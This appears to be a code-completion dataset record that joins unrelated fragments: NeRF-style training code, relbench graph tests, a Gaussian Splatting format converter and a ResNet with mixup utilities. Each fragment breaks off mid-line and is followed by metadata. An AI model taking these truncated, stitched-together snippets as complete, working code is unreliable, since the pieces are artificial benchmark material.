parser.add_argument(\"--N_views\", type=int, default=20,\n help='the number of reference views per ray')\n parser.add_argument(\"--w_rgb\", type=float, default=1.,\n help='weight of rgb loss')\n parser.add_argument(\"--ckpt_path_cls\", type=str, default=None,\n help='checkpoint path of classifier to reload')\n\n # ray-surface distance network\n parser.add_argument(\"--netdepth\", type=int, default=13,\n help='layers in network')\n parser.add_argument(\"--netwidth\", type=int, default=1024,\n help='channels per layer')\n parser.add_argument(\"--rgb_layer\", type=int, default=0,\n help='if true, network predicts radiance')\n parser.add_argument(\"--denoise\", action='store_true',\n help='if true, compute gradients to remove outliers')\n parser.add_argument(\"--grad_normal\", action='store_true',\n help='if true, use gradients to compute surface normal')\n parser.add_argument(\"--grad_clip\", type=float, default=-1,\n help='maximum clip value for grad norm')\n parser.add_argument(\"--outlier_thres\", type=float, default=10.,\n help='threshold to select outliers for minimizing the surface gradient')\n\n # dataset options\n parser.add_argument(\"--datadir\", type=str, default='./datasets',\n help='input data directory')\n parser.add_argument(\"--dataset\", type=str, required=True,\n help='the name of dataset for train/eval')\n parser.add_argument(\"--scene\", type=str, required=True,\n help='the name of scene for train/eval')\n parser.add_argument(\"--trainskip\", type=int, default=1,\n help='will load 1/N images from test/val sets')\n parser.add_argument(\"--testskip\", type=int, default=8,\n help='will load 1/N images from test/val sets')\n parser.add_argument(\"--voxel_sz\", type=float, default=0.005,\n help='size of voxel for tsdf integration')\n parser.add_argument(\"--cd_sample\", type=int, default=30000,\n help='the number of sampling points to compute chamfer-distance')\n parser.add_argument(\"--continuous\", action='store_true',\n help='output continuous distance maps')\n\n # logging/saving options\n parser.add_argument(\"--logdir\", type=str, default='./logs',\n 
help='where to store ckpts and logs')\n parser.add_argument(\"--expname\", type=str, default='',\n help='experiment name')\n parser.add_argument(\"--i_print\", type=int, default=100,\n help='frequency of console printout and metric loggin')\n parser.add_argument(\"--i_img\", type=int, default=5000,\n help='frequency of image logging')\n parser.add_argument(\"--i_weights\", type=int, default=10000,\n help='frequency of weight ckpt saving')\n\n return parser"
},
{
"identifier": "log",
"path": "utils/log.py",
"snippet": "EPS = 1e-8\ndef to_distmap(x, m=None, white_bkgd=True, min=None, max=None):\ndef to_normalmap(x, m=None, white_bkgd=True):\ndef to_colormap(x):\ndef save_config(args):"
},
{
"identifier": "convert_d",
"path": "utils/math.py",
"snippet": "def convert_d(d, scene_info, out='dist'):\n H, W, focal = scene_info['H'], scene_info['W'], scene_info['focal']\n i, j = np.meshgrid(np.arange(W, dtype=np.float32),\n np.arange(H, dtype=np.float32), indexing='xy')\n L = np.sqrt(np.power(j - H / 2., 2) + np.power(i - W / 2., 2) + focal ** 2)\n fl = focal / L\n if out == 'dist':\n return d / fl\n elif out == 'dep':\n return d * fl\n else:\n raise NotImplementedError"
},
{
"identifier": "Dataloader",
"path": "utils/dataloader.py",
"snippet": "class Dataloader:\n def __init__(self, args, device):\n self.args = args\n self.device = device\n self.N_rand = args.N_rand\n\n i_split, self.all_dists, self.all_images, masks, self.cam_poses, self.scene_info = \\\n dataloder_func[args.dataset](args.datadir, args.trainskip, args.testskip)\n\n # restore scene info\n self.scene_info['sphere_radius'] = args.radius\n self.i_train, self.i_test = i_split\n print('TRAIN views are', self.i_train)\n print('TEST views are', self.i_test)\n\n # compute rays\n all_rays = []\n for i, pose in enumerate(self.cam_poses):\n rays_o, rays_d = get_rays_np(self.scene_info, pose) # (H, W, 3), (H, W, 3), (H, W, 1)\n ray = np.concatenate([rays_o, rays_d], -1)\n all_rays.append(ray)\n all_rays = np.stack(all_rays, axis=0)\n\n self.rays, self.dists, self.masks, self.imgs = {}, {}, {}, {}\n for mode, split in zip(['train', 'test'], [self.i_train, self.i_test]):\n self.rays[mode] = np.reshape(all_rays[split], [-1, 6])\n self.dists[mode] = np.reshape(self.all_dists[split], [-1, 1])\n self.masks[mode] = np.reshape(masks[split], [-1, 1])\n if args.rgb_layer > 0:\n self.imgs[mode] = np.reshape(self.all_images[split], [-1, 3])\n\n # extract foreground rays for train/eval\n self.rays[mode+'_fg'] = self.rays[mode][self.masks[mode][:, 0]==1]\n self.dists[mode+'_fg'] = self.dists[mode][self.masks[mode][:, 0]==1]\n self.masks[mode+'_fg'] = self.masks[mode][self.masks[mode][:, 0]==1]\n if args.rgb_layer > 0:\n self.imgs[mode+'_fg'] = self.imgs[mode][self.masks[mode][:, 0]==1]\n\n\n def __call__(self, inds, mode):\n batch_rays = torch.Tensor(self.rays[mode][inds]).to(self.device)\n dists = torch.Tensor(self.dists[mode][inds]).to(self.device)\n masks = torch.Tensor(self.masks[mode][inds]).to(self.device)\n targ_dict = {'dist': dists, 'mask': masks}\n\n if self.args.rgb_layer > 0:\n images = torch.Tensor(self.imgs[mode][inds]).to(self.device)\n targ_dict['image'] = images\n\n return batch_rays, targ_dict"
},
{
"identifier": "get_ray_param",
"path": "utils/ray.py",
"snippet": "def get_ray_param(ray_fn, rays):\n samples, hit_info = ray_fn(rays)\n return samples, hit_info['t0'].detach(), hit_info['ray_dir']"
},
{
"identifier": "create_net",
"path": "net_multiview/network.py",
"snippet": "def create_net(args, scene_info, device):\n ray_fn, input_ch = get_rayparam_func(scene_info)\n\n # initialise classifier and load ckpt\n model_cls = DualVisClassifier(D=args.netdepth_cls, W=args.netwidth_cls,\n input_ch=input_ch, ext_layer=args.ext_layer_cls).to(device)\n if not args.eval_only:\n print('Reloading vis classifier from', args.ckpt_path_cls)\n cls_ckpt = torch.load(args.ckpt_path_cls)\n model_cls.load_state_dict(cls_ckpt['network_fn'])\n\n # initialise distance network for multiview optimization\n model = RaySurfDNet(D=args.netdepth, W=args.netwidth, input_ch=input_ch, rgb_layer=args.rgb_layer).to(device)\n optimizer = torch.optim.Adam(params=model.parameters(), lr=args.lrate, betas=(0.9, 0.999), capturable=True)\n scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer, T_max=args.N_iters, eta_min=args.lrate*0.01)\n\n\n ############# Load checkpoints #############\n ckpts = [os.path.join(args.logdir, args.expname, f) for f in sorted(os.listdir(\n os.path.join(args.logdir, args.expname))) if 'tar' in f]\n print('Found ckpts', ckpts)\n\n start = 0\n if len(ckpts) > 0:\n ckpt_path = ckpts[-1]\n print('Loading ckpt from:', ckpt_path)\n ckpt = torch.load(ckpt_path)\n\n start = ckpt['global_step']\n model.load_state_dict(ckpt['network_fn'])\n optimizer.load_state_dict(ckpt['optimizer'])\n optimizer.param_groups[0]['capturable'] = True\n scheduler.load_state_dict(ckpt['scheduler'])\n scheduler.last_epoch = ckpt['global_step']\n\n return ray_fn, start, model, model_cls, optimizer, scheduler"
},
{
"identifier": "get_multiview_rays",
"path": "net_multiview/sampler.py",
"snippet": "def get_multiview_rays(args, query_rays, query_gts):\n # define the query surface points\n wcoords = query_rays[..., :3] + query_gts['dist'] * query_rays[..., 3:]\n\n # sample points on a unit sphere to construct vectors\n x = 2. * torch.rand([wcoords.shape[0], args.N_views]) - 1.\n y = 2. * torch.rand([wcoords.shape[0], args.N_views]) - 1.\n z = 2. * torch.rand([wcoords.shape[0], args.N_views]) - 1.\n mv_dirs = torch.stack([x, y, z], dim=-1).to(wcoords.device)\n mv_dirs = mv_dirs / (torch.linalg.norm(mv_dirs, dim=-1, keepdim=True) + EPS)\n rays_d = -mv_dirs\n\n # generate new rays\n dist = args.radius * 2.\n rays_o = wcoords[:, None] - dist * rays_d\n mv_rays = torch.concat([rays_o, rays_d], dim=-1) # (B, N_views, 6)\n target_dict = {'dist': torch.ones_like(rays_d[..., :1]) * dist}\n if args.rgb_layer > 0:\n target_dict['image'] = torch.tile(query_gts['image'][:, None], (1, args.N_views, 1))\n\n mv_rays_flat = mv_rays.reshape(-1, 6)\n for k in target_dict:\n target_dict[k] = target_dict[k].reshape(-1, target_dict[k].shape[-1])\n\n return mv_rays_flat, target_dict"
},
{
"identifier": "get_surface_gradient",
"path": "utils/math.py",
"snippet": "def get_surface_gradient(t, raydirs):\n dt = gradient(t, raydirs)\n return torch.norm(dt, dim=-1, keepdim=True)"
},
{
"identifier": "get_surface_normal",
"path": "utils/math.py",
"snippet": "def get_surface_normal(t, raydirs):\n dt = gradient(t, raydirs)\n dtdtheta, dtdphi = dt[..., :1], dt[..., 1:]\n sin_theta, cos_theta = torch.sin(raydirs[..., :1]), torch.cos(raydirs[..., :1])\n sin_phi, cos_phi = torch.sin(raydirs[..., 1:]), torch.cos(raydirs[..., 1:])\n dtheta = torch.cat([(dtdtheta * sin_theta + t * cos_theta) * cos_phi,\n (dtdtheta * sin_theta + t * cos_theta) * sin_phi,\n dtdtheta * cos_theta - t * sin_theta], dim=-1)\n dphi = torch.cat([(dtdphi * cos_phi - t * sin_phi) * sin_theta,\n (dtdphi * sin_phi + t * cos_phi) * sin_theta,\n dtdphi * cos_theta], dim=-1)\n\n normal = torch.cross(dphi, dtheta)\n normal = normal / (torch.linalg.norm(normal+EPS, dim=-1, keepdim=True)+EPS)\n return normal"
}
] | import os
import torch
import numpy as np
import imageio
import trimesh
import open3d as o3d
import wandb
from tqdm import trange
from config import config_parser
from open3d import pipelines
from wandb import AlertLevel
from utils import log
from utils.math import convert_d
from utils.dataloader import Dataloader
from utils.ray import get_ray_param
from net_multiview.network import create_net
from net_multiview.sampler import get_multiview_rays
from utils.math import get_surface_gradient, get_surface_normal
from torchmetrics.functional import peak_signal_noise_ratio as PSNR
from torchmetrics.functional import structural_similarity_index_measure as SSIM
from torchmetrics.image.lpip import LearnedPerceptualImagePatchSimilarity
from chamfer_distance import ChamferDistance | 3,453 |
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
torch.backends.cudnn.benchmark = True
np.random.seed(0)
LPIPS = LearnedPerceptualImagePatchSimilarity(net_type='alex').to(device)
CD = ChamferDistance().to(device)
def train(args):
# Load dataset
dataloader = Dataloader(args, device)
# Create rayparam function and network
|
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
torch.backends.cudnn.benchmark = True
np.random.seed(0)
LPIPS = LearnedPerceptualImagePatchSimilarity(net_type='alex').to(device)
CD = ChamferDistance().to(device)
def train(args):
# Load dataset
dataloader = Dataloader(args, device)
# Create rayparam function and network | ray_fn, global_step, model, model_cls, optimizer, scheduler = create_net(args, dataloader.scene_info, device) | 5 | 2023-10-30 14:05:51+00:00 | 4k |
snap-stanford/relbench | test/external/test_graph.py | [
{
"identifier": "FakeDataset",
"path": "relbench/datasets/fake.py",
"snippet": "class FakeDataset(Dataset):\n name = \"rel-fake\"\n\n def __init__(\n self, num_products: int = 30, num_customers: int = 100, num_reviews: int = 500\n ):\n db = self.make_db(num_products, num_customers, num_reviews)\n db.reindex_pkeys_and_fkeys()\n val_timestamp = db.min_timestamp + 0.8 * (db.max_timestamp - db.min_timestamp)\n test_timestamp = db.min_timestamp + 0.9 * (db.max_timestamp - db.min_timestamp)\n super().__init__(\n db=db,\n val_timestamp=val_timestamp,\n test_timestamp=test_timestamp,\n task_cls_list=[ChurnTask, LTVTask],\n )\n\n def make_db(self, num_products, num_customers, num_reviews) -> Database:\n product_df = pd.DataFrame(\n {\n \"product_id\": [f\"product_id_{i}\" for i in range(num_products)],\n \"category\": [None, [], [\"toy\", \"health\"]] * (num_products // 3),\n \"title\": [_generate_random_string(5, 15) for _ in range(num_products)],\n \"price\": np.random.rand(num_products) * 10,\n }\n )\n customer_df = pd.DataFrame(\n {\n \"customer_id\": [f\"customer_id_{i}\" for i in range(num_customers)],\n \"age\": np.random.randint(10, 50, size=(num_customers,)),\n \"gender\": [\"male\", \"female\"] * (num_customers // 2),\n }\n )\n # Add some dangling foreign keys:\n review_df = pd.DataFrame(\n {\n \"customer_id\": [\n f\"customer_id_{random.randint(0, num_customers+5)}\"\n for _ in range(num_reviews)\n ],\n \"product_id\": [\n f\"product_id_{random.randint(0, num_products-1)}\"\n for _ in range(num_reviews)\n ],\n \"review_time\": pd.to_datetime(10 * np.arange(num_reviews), unit=\"D\"),\n \"rating\": np.random.randint(1, 6, size=(num_reviews,)),\n }\n )\n\n return Database(\n table_dict={\n \"product\": Table(\n df=product_df,\n fkey_col_to_pkey_table={},\n pkey_col=\"product_id\",\n ),\n \"customer\": Table(\n df=customer_df,\n fkey_col_to_pkey_table={},\n pkey_col=\"customer_id\",\n ),\n \"review\": Table(\n df=review_df,\n fkey_col_to_pkey_table={\n \"customer_id\": \"customer\",\n \"product_id\": \"product\",\n },\n time_col=\"review_time\",\n ),\n }\n )"
},
{
"identifier": "get_stype_proposal",
"path": "relbench/external/graph.py",
"snippet": "def get_stype_proposal(db: Database) -> Dict[str, Dict[str, Any]]:\n r\"\"\"Propose stype for columns of a set of tables in the given database.\n\n Args:\n db (Database): : The database object containing a set of tables.\n\n Returns:\n Dict[str, Dict[str, Any]]: A dictionary mapping table name into\n :obj:`col_to_stype` (mapping column names into inferred stypes).\n \"\"\"\n\n inferred_col_to_stype_dict = {}\n for table_name, table in db.table_dict.items():\n inferred_col_to_stype = infer_df_stype(table.df)\n\n # Remove pkey, fkey columns since they will not be used as input\n # feature.\n if table.pkey_col is not None:\n inferred_col_to_stype.pop(table.pkey_col)\n for fkey in table.fkey_col_to_pkey_table.keys():\n inferred_col_to_stype.pop(fkey)\n\n inferred_col_to_stype_dict[table_name] = inferred_col_to_stype\n\n return inferred_col_to_stype_dict"
},
{
"identifier": "make_pkey_fkey_graph",
"path": "relbench/external/graph.py",
"snippet": "def make_pkey_fkey_graph(\n db: Database,\n col_to_stype_dict: Dict[str, Dict[str, stype]],\n text_embedder_cfg: Optional[TextEmbedderConfig] = None,\n cache_dir: Optional[str] = None,\n) -> HeteroData:\n r\"\"\"Given a :class:`Database` object, construct a heterogeneous graph with\n primary-foreign key relationships, together with the column stats of each\n table.\n\n Args:\n db (Database): A database object containing a set of tables.\n col_to_stype_dict (Dict[str, Dict[str, stype]]): Column to stype for\n each table.\n cache_dir (str, optional): A directory for storing materialized tensor\n frames. If specified, we will either cache the file or use the\n cached file. If not specified, we will not use cached file and\n re-process everything from scrach without saving the cache.\n\n Returns:\n HeteroData: The heterogeneous :class:`PyG` object with\n :class:`TensorFrame` feature.\n \"\"\"\n data = HeteroData()\n if cache_dir is not None:\n os.makedirs(cache_dir, exist_ok=True)\n\n for table_name, table in db.table_dict.items():\n # Materialize the tables into tensor frames:\n df = table.df\n # Ensure that pkey is consecutive.\n if table.pkey_col is not None:\n assert (df[table.pkey_col].values == np.arange(len(df))).all()\n\n col_to_stype = col_to_stype_dict[table_name]\n\n if len(col_to_stype) == 0: # Add constant feature in case df is empty:\n col_to_stype = {\"__const__\": stype.numerical}\n df = pd.DataFrame({\"__const__\": np.ones(len(table.df))})\n\n path = (\n None if cache_dir is None else os.path.join(cache_dir, f\"{table_name}.pt\")\n )\n dataset = Dataset(\n df=df,\n col_to_stype=col_to_stype,\n col_to_text_embedder_cfg=text_embedder_cfg,\n ).materialize(path=path)\n\n data[table_name].tf = dataset.tensor_frame\n data[table_name].col_stats = dataset.col_stats\n\n # Add time attribute:\n if table.time_col is not None:\n data[table_name].time = to_unix_time(table.df[table.time_col])\n\n # Add edges:\n for fkey_name, pkey_table_name in table.fkey_col_to_pkey_table.items():\n pkey_index = df[fkey_name]\n # Filter out dangling foreign keys\n mask = ~pkey_index.isna()\n fkey_index = torch.arange(len(pkey_index))\n # Filter dangling foreign keys:\n pkey_index = torch.from_numpy(pkey_index[mask].astype(int).values)\n fkey_index = fkey_index[torch.from_numpy(mask.values)]\n # Ensure no dangling fkeys\n assert (pkey_index < len(db.table_dict[pkey_table_name])).all()\n\n # fkey -> pkey edges\n edge_index = torch.stack([fkey_index, pkey_index], dim=0)\n edge_type = (table_name, f\"f2p_{fkey_name}\", pkey_table_name)\n data[edge_type].edge_index = sort_edge_index(edge_index)\n\n # pkey -> fkey edges\n edge_index = torch.stack([pkey_index, fkey_index], dim=0)\n edge_type = (pkey_table_name, f\"p2f_{fkey_name}\", table_name)\n data[edge_type].edge_index = sort_edge_index(edge_index)\n\n data.validate()\n\n return data"
}
] | from torch_frame import TensorFrame
from torch_frame.config import TextEmbedderConfig
from torch_frame.testing.text_embedder import HashTextEmbedder
from relbench.datasets import FakeDataset
from relbench.external.graph import get_stype_proposal, make_pkey_fkey_graph | 1,922 |
def test_make_pkey_fkey_graph():
dataset = FakeDataset()
data = make_pkey_fkey_graph(
dataset.db,
|
def test_make_pkey_fkey_graph():
dataset = FakeDataset()
data = make_pkey_fkey_graph(
dataset.db, | get_stype_proposal(dataset.db), | 1 | 2023-10-29 18:29:52+00:00 | 4k |
francescofugazzi/3dgsconverter | gsconverter/utils/conversion_functions.py | [
{
"identifier": "Format3dgs",
"path": "gsconverter/utils/format_3dgs.py",
"snippet": "class Format3dgs(BaseConverter):\n def to_cc(self, process_rgb=True):\n debug_print(\"[DEBUG] Starting conversion from 3DGS to CC...\")\n \n # Load vertices from the provided data\n vertices = self.data\n debug_print(f\"[DEBUG] Loaded {len(vertices)} vertices.\")\n\n # Check if RGB processing is required\n if process_rgb:\n debug_print(\"[DEBUG] RGB processing is enabled.\")\n\n # Compute RGB values for the vertices\n rgb_values = Utility.compute_rgb_from_vertex(vertices)\n\n if rgb_values is not None:\n # Define a new data type for the vertices that includes RGB\n new_dtype, prefix = BaseConverter.define_dtype(has_scal=True, has_rgb=True)\n\n # Create a new numpy array with the new data type\n converted_data = np.zeros(vertices.shape, dtype=new_dtype)\n\n # Copy the vertex data to the new numpy array\n Utility.copy_data_with_prefix_check(vertices, converted_data, [prefix])\n\n # Add the RGB values to the new numpy array\n converted_data['red'] = rgb_values[:, 0]\n converted_data['green'] = rgb_values[:, 1]\n converted_data['blue'] = rgb_values[:, 2]\n\n debug_print(\"RGB processing completed.\")\n else:\n debug_print(\"[DEBUG] RGB computation failed. Skipping RGB processing.\")\n process_rgb = False\n\n if not process_rgb:\n debug_print(\"[DEBUG] RGB processing is skipped.\")\n\n # Define a new data type for the vertices without RGB\n new_dtype, prefix = BaseConverter.define_dtype(has_scal=True, has_rgb=False)\n\n # Create a new numpy array with the new data type\n converted_data = np.zeros(vertices.shape, dtype=new_dtype)\n\n # Copy the vertex data to the new numpy array\n Utility.copy_data_with_prefix_check(vertices, converted_data, [prefix])\n\n # For now, we'll just return the converted_data for the sake of this integration\n debug_print(\"[DEBUG] Conversion from 3DGS to CC completed.\")\n return converted_data\n\n def to_3dgs(self):\n debug_print(\"[DEBUG] Starting conversion from 3DGS to 3DGS...\")\n\n # Load vertices from the updated data after all filters\n vertices = self.data\n debug_print(f\"[DEBUG] Loaded {len(vertices)} vertices.\")\n\n # Create a new structured numpy array for 3DGS format\n dtype_3dgs = self.define_dtype(has_scal=False, has_rgb=False) # Define 3DGS dtype without any prefix\n converted_data = np.zeros(vertices.shape, dtype=dtype_3dgs)\n\n # Use the helper function to copy the data from vertices to converted_data\n Utility.copy_data_with_prefix_check(vertices, converted_data, [\"\", \"scal_\", \"scalar_\", \"scalar_scal_\"])\n\n debug_print(\"[DEBUG] Data copying completed.\")\n debug_print(\"[DEBUG] Sample of converted data (first 5 rows):\")\n if config.DEBUG:\n for i in range(5):\n debug_print(converted_data[i])\n\n debug_print(\"[DEBUG] Conversion from 3DGS to 3DGS completed.\")\n return converted_data"
},
{
"identifier": "FormatCC",
"path": "gsconverter/utils/format_cc.py",
"snippet": "class FormatCC(BaseConverter):\n def to_3dgs(self):\n debug_print(\"[DEBUG] Starting conversion from CC to 3DGS...\")\n\n # Load vertices from the updated data after all filters\n vertices = self.data\n debug_print(f\"[DEBUG] Loaded {len(vertices)} vertices.\")\n\n # Create a new structured numpy array for 3DGS format\n dtype_3dgs = self.define_dtype(has_scal=False, has_rgb=False) # Define 3DGS dtype without any prefix\n converted_data = np.zeros(vertices.shape, dtype=dtype_3dgs)\n\n # Use the helper function to copy the data from vertices to converted_data\n Utility.copy_data_with_prefix_check(vertices, converted_data, [\"\", \"scal_\", \"scalar_\", \"scalar_scal_\"])\n\n debug_print(\"[DEBUG] Data copying completed.\")\n debug_print(\"[DEBUG] Sample of converted data (first 5 rows):\")\n if config.DEBUG:\n for i in range(5):\n debug_print(converted_data[i])\n\n debug_print(\"[DEBUG] Conversion from CC to 3DGS completed.\")\n return converted_data\n\n\n def to_cc(self, process_rgb=False):\n debug_print(\"[DEBUG] Processing CC data...\")\n\n # Check if RGB processing is required\n if process_rgb and not self.has_rgb():\n self.add_rgb()\n debug_print(\"[DEBUG] RGB added to data.\")\n else:\n debug_print(\"[DEBUG] RGB processing is skipped or data already has RGB.\")\n \n converted_data = self.data\n \n # For now, we'll just return the converted_data for the sake of this integration\n debug_print(\"[DEBUG] CC data processing completed.\")\n return converted_data\n\n def add_or_ignore_rgb(self, process_rgb=True):\n debug_print(\"[DEBUG] Checking RGB for CC data...\")\n\n # If RGB processing is required and RGB is not present\n if process_rgb and not self.has_rgb():\n # Compute RGB values for the data\n rgb_values = Utility.compute_rgb_from_vertex(self.data)\n\n # Get the new dtype definition from the BaseConverter class\n new_dtype_list, _ = BaseConverter.define_dtype(has_scal=True, has_rgb=True)\n new_dtype = np.dtype(new_dtype_list)\n\n # Create a new structured array that includes fields for RGB\n # It should have the same number of rows as the original data\n converted_data = np.zeros(self.data.shape[0], dtype=new_dtype)\n\n # Copy the data to the new numpy array, preserving existing fields\n for name in self.data.dtype.names:\n converted_data[name] = self.data[name]\n\n # Add the RGB values to the new numpy array\n converted_data['red'] = rgb_values[:, 0]\n converted_data['green'] = rgb_values[:, 1]\n converted_data['blue'] = rgb_values[:, 2]\n\n self.data = converted_data # Update the instance's data with the new data\n debug_print(\"[DEBUG] RGB added to data.\")\n else:\n debug_print(\"[DEBUG] RGB processing is skipped or data already has RGB.\")\n converted_data = self.data # If RGB is not added or skipped, the converted_data is just the original data.\n\n # Return the converted_data\n debug_print(\"[DEBUG] RGB check for CC data completed.\")\n return converted_data"
},
{
"identifier": "FormatParquet",
"path": "gsconverter/utils/format_parquet.py",
"snippet": "class FormatParquet(BaseConverter):\n def to_cc(self, process_rgb=True):\n debug_print(\"[DEBUG] Starting conversion from PARQUET to CC...\")\n \n # Load vertices from the provided data\n vertices = self.data\n debug_print(f\"[DEBUG] Loaded {len(vertices)} vertices.\")\n\n # Check if RGB processing is required\n if process_rgb:\n debug_print(\"[DEBUG] RGB processing is enabled.\")\n\n # Compute RGB values for the vertices\n rgb_values = Utility.compute_rgb_from_vertex(vertices)\n\n if rgb_values is not None:\n # Define a new data type for the vertices that includes RGB\n new_dtype, prefix = BaseConverter.define_dtype(has_scal=True, has_rgb=True)\n\n # Create a new numpy array with the new data type\n converted_data = np.zeros(vertices.shape, dtype=new_dtype)\n\n # Copy the vertex data to the new numpy array\n Utility.copy_data_with_prefix_check(vertices, converted_data, [prefix])\n\n # Add the RGB values to the new numpy array\n converted_data['red'] = rgb_values[:, 0]\n converted_data['green'] = rgb_values[:, 1]\n converted_data['blue'] = rgb_values[:, 2]\n\n debug_print(\"RGB processing completed.\")\n else:\n debug_print(\"[DEBUG] RGB computation failed. Skipping RGB processing.\")\n process_rgb = False\n\n if not process_rgb:\n debug_print(\"[DEBUG] RGB processing is skipped.\")\n\n # Define a new data type for the vertices without RGB\n new_dtype, prefix = BaseConverter.define_dtype(has_scal=True, has_rgb=False)\n\n # Create a new numpy array with the new data type\n converted_data = np.zeros(vertices.shape, dtype=new_dtype)\n\n # Copy the vertex data to the new numpy array\n Utility.copy_data_with_prefix_check(vertices, converted_data, [prefix])\n\n # For now, we'll just return the converted_data for the sake of this integration\n debug_print(\"[DEBUG] Conversion from PARQUET to CC completed.\")\n return converted_data\n\n def to_3dgs(self):\n debug_print(\"[DEBUG] Starting conversion from PARQUET to 3DGS...\")\n\n # Load vertices from the updated data after all filters\n vertices = self.data\n debug_print(f\"[DEBUG] Loaded {len(vertices)} vertices.\")\n\n # Create a new structured numpy array for 3DGS format\n dtype_3dgs = self.define_dtype(has_scal=False, has_rgb=False) # Define 3DGS dtype without any prefix\n converted_data = np.zeros(vertices.shape, dtype=dtype_3dgs)\n\n # Use the helper function to copy the data from vertices to converted_data\n Utility.copy_data_with_prefix_check(vertices, converted_data, [\"\", \"scal_\", \"scalar_\", \"scalar_scal_\"])\n\n debug_print(\"[DEBUG] Data copying completed.\")\n debug_print(\"[DEBUG] Sample of converted data (first 5 rows):\")\n if config.DEBUG:\n for i in range(5):\n debug_print(converted_data[i])\n\n debug_print(\"[DEBUG] Conversion from PARQUET to 3DGS completed.\")\n return converted_data"
},
{
"identifier": "debug_print",
"path": "gsconverter/utils/utility_functions.py",
"snippet": "def debug_print(message):\n if config.DEBUG:\n print(message)"
},
{
"identifier": "process_data",
"path": "gsconverter/utils/data_processing.py",
"snippet": "def process_data(data_object, bbox=None, apply_density_filter=False, remove_flyers=False):\n # Crop the data based on the bounding box if specified\n if bbox:\n min_x, min_y, min_z, max_x, max_y, max_z = bbox\n data_object.crop_by_bbox(min_x, min_y, min_z, max_x, max_y, max_z)\n debug_print(\"[DEBUG] Bounding box cropped.\")\n \n # Apply density filter if required\n if apply_density_filter:\n data_object.data = data_object.apply_density_filter()\n debug_print(\"[DEBUG] Density filter applied.\")\n\n # Remove flyers if required\n if remove_flyers:\n data_object.data = data_object.remove_flyers()\n debug_print(\"[DEBUG] Flyers removed.\")"
}
] | import numpy as np
from .format_3dgs import Format3dgs
from .format_cc import FormatCC
from .format_parquet import FormatParquet
from .utility_functions import debug_print
from .data_processing import process_data # Place this import statement at the top with other imports | 2,662 | """
3D Gaussian Splatting Converter
Copyright (c) 2023 Francesco Fugazzi
This software is released under the MIT License.
For more information about the license, please see the LICENSE file.
"""
def convert(data, source_format, target_format, **kwargs):
| """
3D Gaussian Splatting Converter
Copyright (c) 2023 Francesco Fugazzi
This software is released under the MIT License.
For more information about the license, please see the LICENSE file.
"""
def convert(data, source_format, target_format, **kwargs): | debug_print(f"[DEBUG] Starting conversion from {source_format} to {target_format}...") | 3 | 2023-10-28 15:09:50+00:00 | 4k |
solangii/MICS | models/network/resnet18.py | [
{
"identifier": "to_one_hot",
"path": "utils/mixup_utils.py",
"snippet": "def to_one_hot(inp, num_classes):\n y_onehot = torch.FloatTensor(inp.size(0), num_classes)\n y_onehot.zero_()\n\n y_onehot.scatter_(1, inp.unsqueeze(1).data.cpu(), 1)\n\n return Variable(y_onehot.cuda(), requires_grad=False)"
},
{
"identifier": "middle_mixup_process",
"path": "utils/mixup_utils.py",
"snippet": "def middle_mixup_process(out, target_reweighted, num_base_classes, lam, use_hard_positive_aug,\n add_noise_level=0., mult_noise_level=0., hpa_type=\"none\",\n label_sharpening=True, label_mix=\"vanilla\", label_mix_threshold=0.2, exp_coef=1.,\n predefined_indices=None, gaussian_h1=0.2, piecewise_linear_h1=0.5, piecewise_linear_h2=0., use_softlabel=True):\n indices = np.random.permutation(out.size(0))\n out = out * lam + out[indices] * (1 - lam)\n target_reweighted, mix_label_mask = middle_label_mix_process(target_reweighted, target_reweighted[indices],\n num_base_classes, lam, label_mix,\n label_mix_threshold, exp_coef, gaussian_h1,\n piecewise_linear_h1, piecewise_linear_h2, use_softlabel)\n return out, target_reweighted, mix_label_mask"
},
{
"identifier": "get_lambda",
"path": "utils/mixup_utils.py",
"snippet": "def get_lambda(alpha=1.0):\n '''Return lambda'''\n if alpha > 0.:\n lam = np.random.beta(alpha, alpha)\n else:\n lam = 1.\n return lam"
}
] | import torch
import torch.nn as nn
import errno
import hashlib
import os
import warnings
import re
import shutil
import sys
import tempfile
import numpy as np
import random
from tqdm import tqdm
from urllib.request import urlopen
from urllib.parse import urlparse
from utils.mixup_utils import to_one_hot, middle_mixup_process, get_lambda
from torch.autograd import Variable | 3,449 | out = self.conv3(out)
out = self.bn3(out)
if self.downsample is not None:
identity = self.downsample(x)
out += identity
out = self.relu(out)
return out
class ResNet(nn.Module):
def __init__(self, block, layers, num_classes=1000, zero_init_residual=False,
groups=1, width_per_group=64, replace_stride_with_dilation=None,
norm_layer=None, avg_downsample=False):
super(ResNet, self).__init__()
if norm_layer is None:
norm_layer = nn.BatchNorm2d
self._norm_layer = norm_layer
self.inplanes = 64
self.num_classes = num_classes
self.dilation = 1
self.avg_downsample = avg_downsample
if replace_stride_with_dilation is None:
# each element in the tuple indicates if we should replace
# the 2x2 stride with a dilated convolution instead
replace_stride_with_dilation = [False, False, False]
if len(replace_stride_with_dilation) != 3:
raise ValueError("replace_stride_with_dilation should be None "
"or a 3-element tuple, got {}".format(replace_stride_with_dilation))
self.groups = groups
self.base_width = width_per_group
if avg_downsample:
self.conv1 = nn.Conv2d(3, self.inplanes, kernel_size=7, stride=1, padding=3, bias=False)
else:
self.conv1 = nn.Conv2d(3, self.inplanes, kernel_size=7, stride=2, padding=3, bias=False)
self.bn1 = norm_layer(self.inplanes)
self.relu = nn.ReLU(inplace=True)
self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
self.layer1 = self._make_layer(block, 64, layers[0])
self.layer2 = self._make_layer(block, 128, layers[1], stride=2,
dilate=replace_stride_with_dilation[0])
self.layer3 = self._make_layer(block, 256, layers[2], stride=2,
dilate=replace_stride_with_dilation[1])
self.layer4 = self._make_layer(block, 512, layers[3], stride=2,
dilate=replace_stride_with_dilation[2])
self.avgpool = nn.AdaptiveAvgPool2d((1, 1))
# self.fc = nn.Linear(512 * block.expansion, num_classes,bias=False)
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
elif isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
# Zero-initialize the last BN in each residual branch,
# so that the residual branch starts with zeros, and each residual block behaves like an identity.
# This improves the model by 0.2~0.3% according to https://arxiv.org/abs/1706.02677
if zero_init_residual:
